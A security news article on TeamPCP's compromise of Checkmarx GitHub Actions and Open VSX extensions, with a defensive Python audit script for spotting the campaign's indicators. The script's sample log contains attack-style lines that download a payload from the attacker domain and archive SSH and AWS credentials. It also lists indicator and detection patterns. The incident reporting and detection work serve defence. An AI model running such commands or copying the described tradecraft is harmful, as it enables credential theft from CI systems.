TeamPCP hacks Checkmarx GitHub actions using stolen CI credentials

March 24, 2026
Two more GitHub Actions have been compromised with credential-stealing malware by the threat actor known as TeamPCP, the cloud-native cybercrime operation that was also behind the Trivy supply chain attack.

Both actions are maintained by the supply chain security company Checkmarx.

Cloud security company Sysdig said it observed the same credential stealer used in TeamPCP's operation against Aqua Security's Trivy vulnerability scanner and its related GitHub Actions roughly four days after the March 19, 2026, breach. The Trivy supply chain breach is tracked as CVE-2026-33634 (CVSS score: 9.4).

“This suggests that the credentials stolen in the Trivy breach were used to poison further actions on the affected repositories,” Sysdig said.

Dubbed the “TeamPCP Cloud stealer,” the stealer is designed to steal credentials and secrets related to SSH keys, Git, Amazon Web Services (AWS), Google Cloud, Microsoft Azure, Kubernetes, Docker, .env files, databases, and VPNs, as well as CI/CD configurations, cryptocurrency wallet data, and Slack and Discord webhook URLs.

As with Trivy, the attackers force-pushed existing version tags so that they pointed at malicious commits carrying the stealer payload ('setup.sh'). The stolen data is exfiltrated to the domain checkmarx[.]zone (IP address: 83.142.209[.]11:443) as an encrypted archive ('tpcp.tar.gz').

The new version uses the victim’s GITHUB_TOKEN to create a “docs-tpcp” repository to stage stolen data as a backup method in case the server exfiltration fails. In the Trivy incident, the attackers used the repository name “tpcp-docs” instead.

"Using vendor-specific typosquat domains for each poisoned action is an intentional deception technique," Sysdig said. "Analysts reviewing CI/CD logs will see curled traffic to what appears to be the action's own vendor domain, making it less likely to be detected manually."

The core function of the stealer is to harvest credentials from the CI runner's memory, allowing the operators to extract GitHub personal access tokens (PATs) and other secrets when a compromised Trivy action executes inside a workflow. Worse, if those tokens have write access to a repository that uses a Checkmarx action, an attacker can use them to push malicious code into that action as well.

This opens the door to cascading supply chain compromises, where one poisoned action yields secrets that are then used to poison other actions.

"The identical payload, encryption method, and naming convention for tpcp.tar.gz confirm that this is the same actor expanding its reach beyond the initial Trivy compromise," Sysdig notes. "Code review and dependency scanning failed because malicious code was injected into a trusted action at the source."

According to Wiz, the attack appears to have been carried out via a compromise of the “cx-plugins-releases” service account, and the attackers also published trojanized versions of the Open VSX extensions “ast-results” (version 2.53.0) and “cx-dev-assist” (version 1.7.0). VS Code Marketplace versions are not affected.

Once the extension is activated, the malicious payload checks whether the victim has credentials for at least one cloud provider, such as GitHub, AWS, Google Cloud, or Microsoft Azure. If credentials are found, it fetches the next-stage payload from the same domain (checkmarx[.]zone).

Wiz researchers Rami McCarthy, James Haughom, and Benjamin Read said: "The payload attempts to execute via npx, bunx, pnpx, or yarn dlx. This covers the major JavaScript package managers. The retrieved package contains a comprehensive credential stealer. The harvested credentials are encrypted using a key and exfiltrated as tpcp.tar.gz to checkmarx[.]zone/vsx, as elsewhere in this campaign."

"On non-CI systems, the malware installs persistence through a systemd user service. The persistence script polls https://checkmarx[.]zone/raw every 50 minutes for additional payloads and uses a kill switch to abort if the response contains 'youtube'. The link now redirects to Queen's 'The Show Must Go On'."

To mitigate the threat, we recommend that users take the following actions immediately:

  • Rotate all secrets, tokens, and cloud credentials that CI runners had access to during the affected period.
  • Audit GitHub Actions runner logs for references to tpcp.tar.gz, scan.aquasecurity[.]org, or checkmarx[.]zone.
  • Search your GitHub organization for a repository named "tpcp-docs" or "docs-tpcp"; its presence indicates successful exfiltration via the fallback mechanism.
  • Pin GitHub Actions to full commit SHAs instead of version tags, since tags can be force-pushed.
  • Monitor outbound network connections from CI runners to suspicious domains.
  • Require IMDSv2 and restrict Instance Metadata Service (IMDS) access from CI runner containers.
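The audit steps above (log review for the campaign's indicators, the lookalike-domain trick Sysdig describes, the fallback repository names, and tag pinning) are easy to script. The following is an added example written for this article, not code from Sysdig, Wiz, Checkmarx, or the attackers. The workflow text, log lines, and repository names are constructed for the demo, the action names in them are hypothetical, and the vendor-to-domain mapping used to spot lookalikes is an assumption you would replace with the vendors your pipelines actually call.

```python
"""Post-incident audit helpers for the TeamPCP CI campaign (added example)."""
import re
from urllib.parse import urlsplit

SHA_REF = re.compile(r"^[0-9a-f]{40}$")
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)")

# Indicators named in the article (written here without defanging so they match logs).
IOC_STRINGS = ("tpcp.tar.gz", "scan.aquasecurity.org", "checkmarx.zone")
# Repository names the stealer creates with the victim's GITHUB_TOKEN as an exfil fallback.
FALLBACK_REPOS = {"tpcp-docs", "docs-tpcp"}
# Assumption for the demo: vendor name -> the one domain that vendor legitimately serves from.
VENDOR_DOMAINS = {"checkmarx": "checkmarx.com"}


def unpinned_actions(workflow_yaml: str) -> list:
    """Return (action, ref) pairs whose ref is a mutable tag/branch, not a 40-hex commit SHA.

    Local actions ('./...') and docker:// references are skipped; a version tag such as
    'v2' can be force-pushed to a malicious commit, exactly as happened in this campaign.
    """
    findings = []
    for line in workflow_yaml.splitlines():
        m = USES_LINE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue
        action, _, version = ref.partition("@")
        if not SHA_REF.match(version):
            findings.append((action, version or "<no ref>"))
    return findings


def lookalike_domain(host: str):
    """Return the vendor name if `host` reuses it outside that vendor's real domain."""
    host = host.lower()
    for name, legit in VENDOR_DOMAINS.items():
        if name in host and host != legit and not host.endswith("." + legit):
            return name
    return None


def suspicious_log_lines(log_text: str) -> list:
    """Return (line_no, reason) for lines carrying a known IOC or a vendor-lookalike URL."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        low = line.lower()
        for ioc in IOC_STRINGS:
            if ioc in low:
                hits.append((n, f"ioc:{ioc}"))
                break
        else:  # no exact IOC: check every URL on the line for a vendor-name lookalike
            for url in re.findall(r"https?://[^\s'\"]+", line):
                host = urlsplit(url).hostname or ""
                vendor = lookalike_domain(host)
                if vendor:
                    hits.append((n, f"lookalike:{host} vs {VENDOR_DOMAINS[vendor]}"))
                    break
    return hits


def fallback_repos(repo_names) -> list:
    """Return the org's repositories whose names match the stealer's fallback repos."""
    return sorted(r for r in repo_names if r.lower() in FALLBACK_REPOS)


# Constructed sample inputs; 'example-vendor/*' actions are hypothetical.
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: example-vendor/scan-action@v2
      - uses: example-vendor/build-action@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
"""
SAMPLE_LOG = """\
2026-03-23T10:00:01Z Run example-vendor/scan-action@v2
2026-03-23T10:00:02Z + curl -fsSL https://checkmarx.zone/vsx -o setup.sh
2026-03-23T10:00:03Z + tar czf tpcp.tar.gz ~/.ssh ~/.aws
2026-03-23T10:00:04Z + curl -fsSL https://api.checkmarx.com/health
2026-03-23T10:00:05Z + curl -fsSL https://checkmarx-updates.net/raw
"""
SAMPLE_REPOS = ["infra", "docs-tpcp", "Docs", "tpcp-docs"]

if __name__ == "__main__":
    for action, ref in unpinned_actions(SAMPLE_WORKFLOW):
        print(f"unpinned: {action}@{ref} (pin to a full commit SHA)")
    for n, reason in suspicious_log_lines(SAMPLE_LOG):
        print(f"log line {n}: {reason}")
    print("fallback repos present:", fallback_repos(SAMPLE_REPOS))
```

In real use you would feed `unpinned_actions` the contents of every `.github/workflows/*.yml` in the organization, `suspicious_log_lines` the downloaded runner logs for the affected window, and `fallback_repos` the repository list from the GitHub API. The lookalike check is deliberately broad (any host containing a vendor name that is not under the vendor's own domain gets flagged) because the point is to surface traffic an analyst would otherwise wave through as "the vendor's own domain", not to be a final verdict.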

In the days following the initial breach, TeamPCP attackers pushed a malicious Docker image of Trivy containing the same stealer, took over the company’s “aquasec-com” GitHub organization, and modified dozens of internal repositories.

The group has also been observed targeting Kubernetes clusters with a malicious shell script that wipes machines whose timezone and locale settings match Iran, marking a new expansion of its modus operandi.
